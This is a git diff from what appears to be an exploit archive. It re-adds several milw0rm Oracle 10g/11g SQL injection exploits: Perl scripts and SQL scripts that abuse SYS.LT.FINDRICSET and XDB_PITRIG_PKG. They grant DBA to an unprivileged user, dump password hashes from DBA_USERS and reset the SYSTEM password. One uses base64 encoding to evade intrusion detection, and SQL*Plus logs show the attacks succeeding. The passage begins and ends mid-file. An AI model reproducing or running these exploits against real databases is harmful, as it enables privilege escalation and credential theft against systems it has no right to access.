parameters + ('filter ctxsys.null_filter'); + + +SET SERVEROUTPUT ON; +DECLARE + mklob CLOB; + amt NUMBER := 40; + line VARCHAR2(80); + BEGIN + CTX_DOC.MARKUP('mark_tab_idx','1',''||scott.HACKIT()||'', mklob); + DBMS_LOB.READ(mklob, amt, 1, line); + DBMS_OUTPUT.PUT_LINE('QWRvcmUuVS5NeS5TdGFy'||line); + DBMS_LOB.FREETEMPORARY(mklob); + END; + / + + +select * from user_role_privs; + +/******************************************************************/ +/*************************** SEE U LATER ;) ***********************/ +/******************************************************************/ + +// milw0rm.com [2007-10-23] diff --git a/platforms/multiple/local/4570.pl b/platforms/multiple/local/4570.pl index a98435151..ba49c9c6e 100755 --- a/platforms/multiple/local/4570.pl +++ b/platforms/multiple/local/4570.pl 
@@ -1,113 +1,113 @@ -#!/usr/bin/perl -# -# http://rawlab.mindcreations.com/codes/exp/oracle/sys-lt-findricset.pl -# -# Oracle SYS.LT.FINDRICSET exploit (11g/10g) -# -# Grant or revoke dba permission to unprivileged user -# -# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.5.0" -# -# Fixed with CPU Oct. 2007 -# -# REF: Thanks to Joxean Koret and his excellent Inguma -# http://sourceforge.net/projects/inguma -# -# AUTHOR: Andrea "bunker" Purificato -# http://rawlab.mindcreations.com -# -# DATE: Copyright 2007 - Fri Oct 26 15:03:46 CEST 2007 -# -# Oracle InstantClient (basic + sdk) required for DBD::Oracle -# -# -# bunker@fin:~$ perl sys-lt-findricset.pl -h localhost -s FAKE -u sfigato -p **** -r -# [-] Wait... -# [-] Revoking DBA from SFIGATO... -# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM SFIGATO"] at sys-lt-findricset.pl line 86. -# [-] Done! -# -# bunker@fin:~$ perl sys-lt-findricset.pl -h localhost -s FAKE -u sfigato -p **** -g -# [-] Wait... -# [-] Creating evil function... -# [-] Go... -# [-] YOU GOT THE POWAH!! -# -# bunker@fin:~$ perl sys-lt-findricset.pl -h localhost -s FAKE -u sfigato -p **** -r -# [-] Wait... -# [-] Revoking DBA from SFIGATO... -# [-] Done! 
-# - -use warnings; -use strict; -use DBI; -use Getopt::Std; -use vars qw/ %opt /; - -sub usage { - print <<"USAGE"; - -Syntax: $0 -h -s -u -p -g|-r [-P ] - -Options: - -h target server address - -s target sid name - -u user - -p password - - -g|-r (g)rant dba to user | (r)evoke dba from user - [-P Oracle port] - -USAGE - exit 0 -} - -my $opt_string = 'h:s:u:p:grP:'; -getopts($opt_string, \%opt) or &usage; -&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} ); -&usage if ( !$opt{g} and !$opt{r} ); -my $user = uc $opt{u}; - -my $dbh = undef; -if ($opt{P}) { - $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die; -} else { - $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die; -} - -my $sqlcmd = "GRANT DBA TO $user"; -print "[-] Wait...\n"; - -if ($opt{r}) { - print "[-] Revoking DBA from $user...\n"; - $sqlcmd = "REVOKE DBA FROM $user"; - $dbh->do( $sqlcmd ); - print "[-] Done!\n"; - $dbh->disconnect; - exit; -} - -print "[-] Creating evil function...\n"; -$dbh->do( qq{ -CREATE OR REPLACE FUNCTION OWN RETURN NUMBER - AUTHID CURRENT_USER AS - PRAGMA AUTONOMOUS_TRANSACTION; -BEGIN - EXECUTE IMMEDIATE '$sqlcmd'; COMMIT; - RETURN(0); -END; -} ); - -print "[-] Go...\n"; -my $sth = $dbh->prepare( qq{ -BEGIN - SYS.LT.FINDRICSET('.''||$user.own||'''')--','x'); -END;}); -$sth->execute; -$sth->finish; -print "[-] YOU GOT THE POWAH!!\n"; -$dbh->disconnect; -exit; - -# milw0rm.com [2007-10-27] +#!/usr/bin/perl +# +# http://rawlab.mindcreations.com/codes/exp/oracle/sys-lt-findricset.pl +# +# Oracle SYS.LT.FINDRICSET exploit (11g/10g) +# +# Grant or revoke dba permission to unprivileged user +# +# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.5.0" +# +# Fixed with CPU Oct. 
2007 +# +# REF: Thanks to Joxean Koret and his excellent Inguma +# http://sourceforge.net/projects/inguma +# +# AUTHOR: Andrea "bunker" Purificato +# http://rawlab.mindcreations.com +# +# DATE: Copyright 2007 - Fri Oct 26 15:03:46 CEST 2007 +# +# Oracle InstantClient (basic + sdk) required for DBD::Oracle +# +# +# bunker@fin:~$ perl sys-lt-findricset.pl -h localhost -s FAKE -u sfigato -p **** -r +# [-] Wait... +# [-] Revoking DBA from SFIGATO... +# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM SFIGATO"] at sys-lt-findricset.pl line 86. +# [-] Done! +# +# bunker@fin:~$ perl sys-lt-findricset.pl -h localhost -s FAKE -u sfigato -p **** -g +# [-] Wait... +# [-] Creating evil function... +# [-] Go... +# [-] YOU GOT THE POWAH!! +# +# bunker@fin:~$ perl sys-lt-findricset.pl -h localhost -s FAKE -u sfigato -p **** -r +# [-] Wait... +# [-] Revoking DBA from SFIGATO... +# [-] Done! +# + +use warnings; +use strict; +use DBI; +use Getopt::Std; +use vars qw/ %opt /; + +sub usage { + print <<"USAGE"; + +Syntax: $0 -h -s -u -p -g|-r [-P ] + +Options: + -h target server address + -s target sid name + -u user + -p password + + -g|-r (g)rant dba to user | (r)evoke dba from user + [-P Oracle port] + +USAGE + exit 0 +} + +my $opt_string = 'h:s:u:p:grP:'; +getopts($opt_string, \%opt) or &usage; +&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} ); +&usage if ( !$opt{g} and !$opt{r} ); +my $user = uc $opt{u}; + +my $dbh = undef; +if ($opt{P}) { + $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die; +} else { + $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die; +} + +my $sqlcmd = "GRANT DBA TO $user"; +print "[-] Wait...\n"; + +if ($opt{r}) { + print "[-] Revoking DBA from $user...\n"; + $sqlcmd = "REVOKE DBA FROM $user"; + $dbh->do( $sqlcmd ); + print "[-] Done!\n"; + $dbh->disconnect; + exit; +} + +print "[-] Creating evil 
function...\n"; +$dbh->do( qq{ +CREATE OR REPLACE FUNCTION OWN RETURN NUMBER + AUTHID CURRENT_USER AS + PRAGMA AUTONOMOUS_TRANSACTION; +BEGIN + EXECUTE IMMEDIATE '$sqlcmd'; COMMIT; + RETURN(0); +END; +} ); + +print "[-] Go...\n"; +my $sth = $dbh->prepare( qq{ +BEGIN + SYS.LT.FINDRICSET('.''||$user.own||'''')--','x'); +END;}); +$sth->execute; +$sth->finish; +print "[-] YOU GOT THE POWAH!!\n"; +$dbh->disconnect; +exit; + +# milw0rm.com [2007-10-27] diff --git a/platforms/multiple/local/4571.pl b/platforms/multiple/local/4571.pl index 1bae9d9ff..294fb7b08 100755 --- a/platforms/multiple/local/4571.pl +++ b/platforms/multiple/local/4571.pl 
@@ -1,127 +1,127 @@ -#!/usr/bin/perl -# -# http://rawlab.mindcreations.com/codes/exp/oracle/sys-lt-findricsetV2.pl -# -# Oracle SYS.LT.FINDRICSET exploit (11g/10g) -# - Version 2 - New "evil cursor injection" tip! -# - No "create procedure" privilege needed! -# - See: http://www.databasesecurity.com/ (Cursor Injection) -# -# Grant or revoke dba permission to unprivileged user -# -# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.5.0" -# -# Fixed with CPU Oct. 2007 -# -# REF: Thanks to Joxean Koret and his excellent Inguma -# http://sourceforge.net/projects/inguma -# -# AUTHOR: Andrea "bunker" Purificato -# http://rawlab.mindcreations.com -# -# DATE: Copyright 2007 - Fri Oct 26 15:03:46 CEST 2007 -# -# Oracle InstantClient (basic + sdk) required for DBD::Oracle -# -# -# bunker@fin:~$ perl sys-lt-findricsetV2.pl -h localhost -s FAKE -u sfigato -p **** -r -# [-] Wait... -# [-] Revoking DBA from SFIGATO... -# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM SFIGATO"] at sys-lt-findricsetV2.pl line 69. -# [-] Done! -# -# bunker@fin:~$ perl sys-lt-findricsetV2.pl -h localhost -s FAKE -u sfigato -p **** -g -# [-] Wait... -# [-] Creating evil cursor... -# Cursor: 1 -# [-] Go... -# [-] YOU GOT THE POWAH!! -# -# bunker@fin:~$ perl sys-lt-findricsetV2.pl -h localhost -s FAKE -u sfigato -p **** -r -# [-] Wait... -# [-] Revoking DBA from SFIGATO... -# [-] Done! 
-# - -use warnings; -use strict; -use DBI; -use Getopt::Std; -use vars qw/ %opt /; - -sub usage { - print <<"USAGE"; - -Syntax: $0 -h -s -u -p -g|-r [-P ] - -Options: - -h target server address - -s target sid name - -u user - -p password - - -g|-r (g)rant dba to user | (r)evoke dba from user - [-P Oracle port] - -USAGE - exit 0 -} - -my $opt_string = 'h:s:u:p:grP:'; -getopts($opt_string, \%opt) or &usage; -&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} ); -&usage if ( !$opt{g} and !$opt{r} ); -my $user = uc $opt{u}; - -my $dbh = undef; -if ($opt{P}) { - $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die; -} else { - $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die; -} - -my $sqlcmd = "GRANT DBA TO $user"; -print "[-] Wait...\n"; -$dbh->func( 1000000, 'dbms_output_enable' ); - - -if ($opt{r}) { - print "[-] Revoking DBA from $user...\n"; - $sqlcmd = "REVOKE DBA FROM $user"; - $dbh->do( $sqlcmd ); - print "[-] Done!\n"; - $dbh->disconnect; - exit; -} - -print "[-] Creating evil cursor...\n"; -my $sth = $dbh->prepare(qq{ -DECLARE -MYC NUMBER; -BEGIN - MYC := DBMS_SQL.OPEN_CURSOR; - DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''$sqlcmd'';commit;end;',0); - DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC); -END; -} ); -$sth->execute; -my $cursor = undef; -while (my $line = $dbh->func( 'dbms_output_get' )) { - print "$line\n"; - if ($line =~ /^Cursor: (\d)/) {$cursor = $1;} -} -$sth->finish; - -print "[-] Go...\n"; -$sth = $dbh->prepare(qq{ -BEGIN - SYS.LT.FINDRICSET('.''||dbms_sql.execute($cursor)||'''')--','x'); -END; -}); -$sth->execute; -$sth->finish; -print "[-] YOU GOT THE POWAH!!\n"; -$dbh->disconnect; -exit; - -# milw0rm.com [2007-10-27] +#!/usr/bin/perl +# +# http://rawlab.mindcreations.com/codes/exp/oracle/sys-lt-findricsetV2.pl +# +# Oracle SYS.LT.FINDRICSET exploit (11g/10g) +# - Version 2 - New "evil cursor injection" tip! 
+# - No "create procedure" privilege needed! +# - See: http://www.databasesecurity.com/ (Cursor Injection) +# +# Grant or revoke dba permission to unprivileged user +# +# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.5.0" +# +# Fixed with CPU Oct. 2007 +# +# REF: Thanks to Joxean Koret and his excellent Inguma +# http://sourceforge.net/projects/inguma +# +# AUTHOR: Andrea "bunker" Purificato +# http://rawlab.mindcreations.com +# +# DATE: Copyright 2007 - Fri Oct 26 15:03:46 CEST 2007 +# +# Oracle InstantClient (basic + sdk) required for DBD::Oracle +# +# +# bunker@fin:~$ perl sys-lt-findricsetV2.pl -h localhost -s FAKE -u sfigato -p **** -r +# [-] Wait... +# [-] Revoking DBA from SFIGATO... +# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM SFIGATO"] at sys-lt-findricsetV2.pl line 69. +# [-] Done! +# +# bunker@fin:~$ perl sys-lt-findricsetV2.pl -h localhost -s FAKE -u sfigato -p **** -g +# [-] Wait... +# [-] Creating evil cursor... +# Cursor: 1 +# [-] Go... +# [-] YOU GOT THE POWAH!! +# +# bunker@fin:~$ perl sys-lt-findricsetV2.pl -h localhost -s FAKE -u sfigato -p **** -r +# [-] Wait... +# [-] Revoking DBA from SFIGATO... +# [-] Done! 
+# + +use warnings; +use strict; +use DBI; +use Getopt::Std; +use vars qw/ %opt /; + +sub usage { + print <<"USAGE"; + +Syntax: $0 -h -s -u -p -g|-r [-P ] + +Options: + -h target server address + -s target sid name + -u user + -p password + + -g|-r (g)rant dba to user | (r)evoke dba from user + [-P Oracle port] + +USAGE + exit 0 +} + +my $opt_string = 'h:s:u:p:grP:'; +getopts($opt_string, \%opt) or &usage; +&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} ); +&usage if ( !$opt{g} and !$opt{r} ); +my $user = uc $opt{u}; + +my $dbh = undef; +if ($opt{P}) { + $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die; +} else { + $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die; +} + +my $sqlcmd = "GRANT DBA TO $user"; +print "[-] Wait...\n"; +$dbh->func( 1000000, 'dbms_output_enable' ); + + +if ($opt{r}) { + print "[-] Revoking DBA from $user...\n"; + $sqlcmd = "REVOKE DBA FROM $user"; + $dbh->do( $sqlcmd ); + print "[-] Done!\n"; + $dbh->disconnect; + exit; +} + +print "[-] Creating evil cursor...\n"; +my $sth = $dbh->prepare(qq{ +DECLARE +MYC NUMBER; +BEGIN + MYC := DBMS_SQL.OPEN_CURSOR; + DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''$sqlcmd'';commit;end;',0); + DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC); +END; +} ); +$sth->execute; +my $cursor = undef; +while (my $line = $dbh->func( 'dbms_output_get' )) { + print "$line\n"; + if ($line =~ /^Cursor: (\d)/) {$cursor = $1;} +} +$sth->finish; + +print "[-] Go...\n"; +$sth = $dbh->prepare(qq{ +BEGIN + SYS.LT.FINDRICSET('.''||dbms_sql.execute($cursor)||'''')--','x'); +END; +}); +$sth->execute; +$sth->finish; +print "[-] YOU GOT THE POWAH!!\n"; +$dbh->disconnect; +exit; + +# milw0rm.com [2007-10-27] diff --git a/platforms/multiple/local/4572.txt b/platforms/multiple/local/4572.txt index d20421ea4..35fc37331 100755 --- a/platforms/multiple/local/4572.txt +++ b/platforms/multiple/local/4572.txt 
@@ -1,50 +1,50 @@ -/******************************************************************/ -/******* Oracle 10g LT.FINDRICSET SQL Injection Exploit **********/ -/******************************************************************/ -/*********** sploit grant DBA to scott **************/ -/*********** evil cursor injection **************/ -/*********** No "create procedure" privileg needed! **************/ -/*********** + Funny IDS evasion vith base64 **************/ -/******************************************************************/ -/***************** tested on oracle 10.1.0.2.0 *******************/ -/******************************************************************/ -/******************************************************************/ -/* Date of Public EXPLOIT: October 26, 2007 */ -/* Written by: Alexandr "Sh2kerr" Polyakov */ -/* email: Alexandr.Polyakov@dsec.ru */ -/* site: http://www.dsec.ru */ -/******************************************************************/ -/* Original Advisory by: */ -/* David Litchfield [ davidl@ngssoftware.com ] */ -/* Reported: 22nd August 2006 */ -/* Date of Public Advisory: October 17, 2007 */ -/* Advisory number: #NISR17102007B */ -/* */ -/******************************************************************/ -/* P.S. 
Special thanks David Litchfield for all his work **/ -/******************************************************************/ - - -/* you may need some tweaks to make it work with other users except skott :) */ - - -select * from user_role_privs; - - -DECLARE -c2gya2Vy NUMBER; -BEGIN - c2gya2Vy := DBMS_SQL.OPEN_CURSOR; -DBMS_SQL.PARSE(c2gya2Vy,utl_encode.text_decode('ZGVjbGFyZSBwcmFnbWEgYXV0b25vbW91c190cmFuc2FjdGlvbjsgYmVnaW4gZXhlY3V0ZSBpbW1lZGlhdGUgJ0dSQU5UIERCQSBUTyBTQ09UV - -Cc7Y29tbWl0O2VuZDs=','WE8ISO8859P1', UTL_ENCODE.BASE64),0); - SYS.LT.FINDRICSET('TGV2ZWwgMSBjb21sZXRlIDop.U2VlLnUubGF0ZXIp''||dbms_sql.execute('||c2gya2Vy||')||''','DEADBEAF'); -END; - - -select * from user_role_privs; - ------------------------------LOG--------------------------------------------- --- -- --SQL*Plus: Release 10.1.0.2.0 - Production on Fri Oct 26 16:51:39 2007 -- --Copyright (c) 1982, 2004, Oracle. All rights reserved. -- -- --Connected to: --Oracle Database 10g Enterprise Edition Release 10.1.0.2.0 - Production --With the Partitioning, OLAP and Data Mining options -- -- -- --SQL> select * from user_role_privs; -- --USERNAME GRANTED_ROLE ADM DEF OS_ -------------------------------- ------------------------------ --- --- --- --SCOTT CONNECT NO YES NO --SCOTT RESOURCE NO YES NO -- --SQL> DECLARE -- 2 c2gya2Vy NUMBER; -- 3 BEGIN -- 4 c2gya2Vy := DBMS_SQL.OPEN_CURSOR; -- 5 DBMS_SQL.PARSE(c2gya2Vy,utl_encode.text_decode('ZGVjbGFyZSBwcmFnbWEgYXV0b25 --vbW91c190cmFuc2FjdGlvbjsgYmVnaW4gZXhlY3V0ZSBpbW1lZGlhdGUgJ0dSQU5UIERCQSBUTyBTQ09 --UVCc7Y29tbWl0O2VuZDs=','WE8ISO8859P1', UTL_ENCODE.BASE64),0); --6 SYS.LT.FINDRICSET('TGV2ZWwgMSBjb21sZXRlIDop.U2VlLnUubGF0ZXIp''||dbms_sql. --execute('||c2gya2Vy||')||''','DEADBEAF'); --7 END; --8 / --TGV2ZWWGMSBJB21SZXRLIDOP.U2VLLNUUBGF0ZXIP1 -- --PL/SQL procedure successfully completed. 
-- --SQL> select * from user_role_privs; -- --USERNAME GRANTED_ROLE ADM DEF OS_ -------------------------------- ------------------------------ --- --- --- --SCOTT CONNECT NO YES NO --SCOTT DBA NO YES NO --SCOTT RESOURCE NO YES NO -- --SQL> -- -- -- - -// milw0rm.com [2007-10-27] +/******************************************************************/ +/******* Oracle 10g LT.FINDRICSET SQL Injection Exploit **********/ +/******************************************************************/ +/*********** sploit grant DBA to scott **************/ +/*********** evil cursor injection **************/ +/*********** No "create procedure" privileg needed! **************/ +/*********** + Funny IDS evasion vith base64 **************/ +/******************************************************************/ +/***************** tested on oracle 10.1.0.2.0 *******************/ +/******************************************************************/ +/******************************************************************/ +/* Date of Public EXPLOIT: October 26, 2007 */ +/* Written by: Alexandr "Sh2kerr" Polyakov */ +/* email: Alexandr.Polyakov@dsec.ru */ +/* site: http://www.dsec.ru */ +/******************************************************************/ +/* Original Advisory by: */ +/* David Litchfield [ davidl@ngssoftware.com ] */ +/* Reported: 22nd August 2006 */ +/* Date of Public Advisory: October 17, 2007 */ +/* Advisory number: #NISR17102007B */ +/* */ +/******************************************************************/ +/* P.S. 
Special thanks David Litchfield for all his work **/ +/******************************************************************/ + + +/* you may need some tweaks to make it work with other users except skott :) */ + + +select * from user_role_privs; + + +DECLARE +c2gya2Vy NUMBER; +BEGIN + c2gya2Vy := DBMS_SQL.OPEN_CURSOR; +DBMS_SQL.PARSE(c2gya2Vy,utl_encode.text_decode('ZGVjbGFyZSBwcmFnbWEgYXV0b25vbW91c190cmFuc2FjdGlvbjsgYmVnaW4gZXhlY3V0ZSBpbW1lZGlhdGUgJ0dSQU5UIERCQSBUTyBTQ09UV + +Cc7Y29tbWl0O2VuZDs=','WE8ISO8859P1', UTL_ENCODE.BASE64),0); + SYS.LT.FINDRICSET('TGV2ZWwgMSBjb21sZXRlIDop.U2VlLnUubGF0ZXIp''||dbms_sql.execute('||c2gya2Vy||')||''','DEADBEAF'); +END; + + +select * from user_role_privs; + +-----------------------------LOG--------------------------------------------- +-- -- --SQL*Plus: Release 10.1.0.2.0 - Production on Fri Oct 26 16:51:39 2007 -- --Copyright (c) 1982, 2004, Oracle. All rights reserved. -- -- --Connected to: --Oracle Database 10g Enterprise Edition Release 10.1.0.2.0 - Production --With the Partitioning, OLAP and Data Mining options -- -- -- --SQL> select * from user_role_privs; -- --USERNAME GRANTED_ROLE ADM DEF OS_ -------------------------------- ------------------------------ --- --- --- --SCOTT CONNECT NO YES NO --SCOTT RESOURCE NO YES NO -- --SQL> DECLARE -- 2 c2gya2Vy NUMBER; -- 3 BEGIN -- 4 c2gya2Vy := DBMS_SQL.OPEN_CURSOR; -- 5 DBMS_SQL.PARSE(c2gya2Vy,utl_encode.text_decode('ZGVjbGFyZSBwcmFnbWEgYXV0b25 --vbW91c190cmFuc2FjdGlvbjsgYmVnaW4gZXhlY3V0ZSBpbW1lZGlhdGUgJ0dSQU5UIERCQSBUTyBTQ09 --UVCc7Y29tbWl0O2VuZDs=','WE8ISO8859P1', UTL_ENCODE.BASE64),0); --6 SYS.LT.FINDRICSET('TGV2ZWwgMSBjb21sZXRlIDop.U2VlLnUubGF0ZXIp''||dbms_sql. --execute('||c2gya2Vy||')||''','DEADBEAF'); --7 END; --8 / --TGV2ZWWGMSBJB21SZXRLIDOP.U2VLLNUUBGF0ZXIP1 -- --PL/SQL procedure successfully completed. 
-- --SQL> select * from user_role_privs; -- --USERNAME GRANTED_ROLE ADM DEF OS_ -------------------------------- ------------------------------ --- --- --- --SCOTT CONNECT NO YES NO --SCOTT DBA NO YES NO --SCOTT RESOURCE NO YES NO -- --SQL> -- -- -- + +// milw0rm.com [2007-10-27] diff --git a/platforms/multiple/local/4994.sql b/platforms/multiple/local/4994.sql index 8ebed93b7..53681a3b3 100755 --- a/platforms/multiple/local/4994.sql +++ b/platforms/multiple/local/4994.sql 
@@ -1,51 +1,51 @@ -/******************************************************************/ -/******* Oracle 10g R1 xDb.XDB_PITRIG_PKG.PITRIG_DROP **********/ -/******* SQL Injection Exploit **********/ -/******************************************************************/ -/************ sploit get password Hashes ***************/ -/******************************************************************/ -/****************** BY Sh2kerr (Digital Security) ***************/ -/******************************************************************/ -/***************** tested on oracle 10.1.0.2.0 *******************/ -/******************************************************************/ -/******************************************************************/ -/* Date of Public EXPLOIT: January 28, 2008 */ -/* Written by: Alexandr "Sh2kerr" Polyakov */ -/* email: Alexandr.Polyakov@dsec.ru */ -/* site: http://www.dsec.ru */ -/******************************************************************/ -/* Original Advisory by: */ -/* Alexandr Polyakov [ Alexandr.Polyakov@dsec.ru] */ -/* Reported: 18 Dec 2007 */ -/* Date of Public Advisory: January 15, 2008 */ -/* Advisory: http://www.oracle.com/technology/deploy/ */ -/* security/critical-patch-updates/cpujan2008.html */ -/* */ -/******************************************************************/ - - -CREATE TABLE SH2KERR(id NUMBER,name VARCHAR(20),password VARCHAR(16)); - -CREATE OR REPLACE FUNCTION SHOWPASS return varchar2 -authid current_user as -pragma autonomous_transaction; -BEGIN -EXECUTE IMMEDIATE 'INSERT INTO SCOTT.sh2kerr(id,name,password) SELECT user_id,username,password FROM DBA_USERS'; -COMMIT; -RETURN ''; -END; -/ - - -EXEC XDB.XDB_PITRIG_PKG.PITRIG_DROP('SCOTT"."SH2KERR" WHERE 1=SCOTT.SHOWPASS()--','HELLO IDS IT IS EXPLOIT :)'); - -select * from sh2kerr; - - - - -/******************************************************************/ -/*************************** SEE U LATER ;) ***********************/ 
-/******************************************************************/ - -// milw0rm.com [2008-01-28] +/******************************************************************/ +/******* Oracle 10g R1 xDb.XDB_PITRIG_PKG.PITRIG_DROP **********/ +/******* SQL Injection Exploit **********/ +/******************************************************************/ +/************ sploit get password Hashes ***************/ +/******************************************************************/ +/****************** BY Sh2kerr (Digital Security) ***************/ +/******************************************************************/ +/***************** tested on oracle 10.1.0.2.0 *******************/ +/******************************************************************/ +/******************************************************************/ +/* Date of Public EXPLOIT: January 28, 2008 */ +/* Written by: Alexandr "Sh2kerr" Polyakov */ +/* email: Alexandr.Polyakov@dsec.ru */ +/* site: http://www.dsec.ru */ +/******************************************************************/ +/* Original Advisory by: */ +/* Alexandr Polyakov [ Alexandr.Polyakov@dsec.ru] */ +/* Reported: 18 Dec 2007 */ +/* Date of Public Advisory: January 15, 2008 */ +/* Advisory: http://www.oracle.com/technology/deploy/ */ +/* security/critical-patch-updates/cpujan2008.html */ +/* */ +/******************************************************************/ + + +CREATE TABLE SH2KERR(id NUMBER,name VARCHAR(20),password VARCHAR(16)); + +CREATE OR REPLACE FUNCTION SHOWPASS return varchar2 +authid current_user as +pragma autonomous_transaction; +BEGIN +EXECUTE IMMEDIATE 'INSERT INTO SCOTT.sh2kerr(id,name,password) SELECT user_id,username,password FROM DBA_USERS'; +COMMIT; +RETURN ''; +END; +/ + + +EXEC XDB.XDB_PITRIG_PKG.PITRIG_DROP('SCOTT"."SH2KERR" WHERE 1=SCOTT.SHOWPASS()--','HELLO IDS IT IS EXPLOIT :)'); + +select * from sh2kerr; + + + + +/******************************************************************/ 
+/*************************** SEE U LATER ;) ***********************/ +/******************************************************************/ + +// milw0rm.com [2008-01-28] diff --git a/platforms/multiple/local/4995.sql b/platforms/multiple/local/4995.sql index e08289b93..a7847e86a 100755 --- a/platforms/multiple/local/4995.sql +++ b/platforms/multiple/local/4995.sql 
@@ -1,51 +1,51 @@ -/******************************************************************/ -/******* Oracle 10g R1 xDb.XDB_PITRIG_PKG.PITRIG_TRUNCATE *********/ -/******* SQL Injection Exploit *********/ -/******************************************************************/ -/************ sploit get password Hashes ***************/ -/******************************************************************/ -/****************** BY Sh2kerr (Digital Security) ***************/ -/******************************************************************/ -/***************** tested on oracle 10.1.0.2.0 *******************/ -/******************************************************************/ -/******************************************************************/ -/* Date of Public EXPLOIT: January 28, 2008 */ -/* Written by: Alexandr "Sh2kerr" Polyakov */ -/* email: Alexandr.Polyakov@dsec.ru */ -/* site: http://www.dsec.ru */ -/******************************************************************/ -/* Original Advisory by: */ -/* Alexandr Polyakov [ Alexandr.Polyakov@dsec.ru] */ -/* Reported: 18 Dec 2007 */ -/* Date of Public Advisory: January 15, 2008 */ -/* Advisory: http://www.oracle.com/technology/deploy/ */ -/* security/critical-patch-updates/cpujan2008.html */ -/* */ -/******************************************************************/ - - -CREATE TABLE SH2KERR(id NUMBER,name VARCHAR(20),password VARCHAR(16)); - -CREATE OR REPLACE FUNCTION SHOWPASS return varchar2 -authid current_user as -pragma autonomous_transaction; -BEGIN -EXECUTE IMMEDIATE 'INSERT INTO SCOTT.sh2kerr(id,name,password) SELECT user_id,username,password FROM DBA_USERS'; -COMMIT; -RETURN ''; -END; -/ - - -EXEC XDB.XDB_PITRIG_PKG.PITRIG_TRUNCATE('SCOTT"."SH2KERR" WHERE 1=SCOTT.SHOWPASS()--','HELLO IDS IT IS EXPLOIT :)'); - -select * from sh2kerr; - - - - -/******************************************************************/ -/*************************** SEE U LATER ;) ***********************/ 
-/******************************************************************/ - -// milw0rm.com [2008-01-28] +/******************************************************************/ +/******* Oracle 10g R1 xDb.XDB_PITRIG_PKG.PITRIG_TRUNCATE *********/ +/******* SQL Injection Exploit *********/ +/******************************************************************/ +/************ sploit get password Hashes ***************/ +/******************************************************************/ +/****************** BY Sh2kerr (Digital Security) ***************/ +/******************************************************************/ +/***************** tested on oracle 10.1.0.2.0 *******************/ +/******************************************************************/ +/******************************************************************/ +/* Date of Public EXPLOIT: January 28, 2008 */ +/* Written by: Alexandr "Sh2kerr" Polyakov */ +/* email: Alexandr.Polyakov@dsec.ru */ +/* site: http://www.dsec.ru */ +/******************************************************************/ +/* Original Advisory by: */ +/* Alexandr Polyakov [ Alexandr.Polyakov@dsec.ru] */ +/* Reported: 18 Dec 2007 */ +/* Date of Public Advisory: January 15, 2008 */ +/* Advisory: http://www.oracle.com/technology/deploy/ */ +/* security/critical-patch-updates/cpujan2008.html */ +/* */ +/******************************************************************/ + + +CREATE TABLE SH2KERR(id NUMBER,name VARCHAR(20),password VARCHAR(16)); + +CREATE OR REPLACE FUNCTION SHOWPASS return varchar2 +authid current_user as +pragma autonomous_transaction; +BEGIN +EXECUTE IMMEDIATE 'INSERT INTO SCOTT.sh2kerr(id,name,password) SELECT user_id,username,password FROM DBA_USERS'; +COMMIT; +RETURN ''; +END; +/ + + +EXEC XDB.XDB_PITRIG_PKG.PITRIG_TRUNCATE('SCOTT"."SH2KERR" WHERE 1=SCOTT.SHOWPASS()--','HELLO IDS IT IS EXPLOIT :)'); + +select * from sh2kerr; + + + + +/******************************************************************/ 
+/*************************** SEE U LATER ;) ***********************/ +/******************************************************************/ + +// milw0rm.com [2008-01-28] diff --git a/platforms/multiple/local/4996.sql b/platforms/multiple/local/4996.sql index a22b386b8..b8d0d8ec7 100755 --- a/platforms/multiple/local/4996.sql +++ b/platforms/multiple/local/4996.sql 
@@ -1,51 +1,51 @@ -/******************************************************************/ -/******* Oracle 10g R1 xDb.XDB_PITRIG_PKG.PITRIG_DROP **********/ -/******* SQL Injection Exploit **********/ -/******************************************************************/ -/************ exploit change system password **************/ -/******************************************************************/ -/****************** BY Sh2kerr (Digital Security) ***************/ -/******************************************************************/ -/***************** tested on oracle 10.1.0.2.0 *******************/ -/******************************************************************/ -/******************************************************************/ -/* Date of Public EXPLOIT: January 25, 2008 */ -/* Written by: Alexandr "Sh2kerr" Polyakov */ -/* email: Alexandr.Polyakov@dsec.ru */ -/* site: http://www.dsec.ru */ -/******************************************************************/ -/* Original Advisory by: */ -/* Alexandr Polyakov [ Alexandr.Polyakov@dsec.ru] */ -/* Reported: 18 Dec 2007 */ -/* Date of Public Advisory: January 15, 2008 */ -/* Advisory: http://www.oracle.com/technology/deploy/ */ -/* security/critical-patch-updates/cpujan2008.html */ -/* */ -/******************************************************************/ - - - -/* set password 12345 to user SYSTEM */ - -CREATE OR 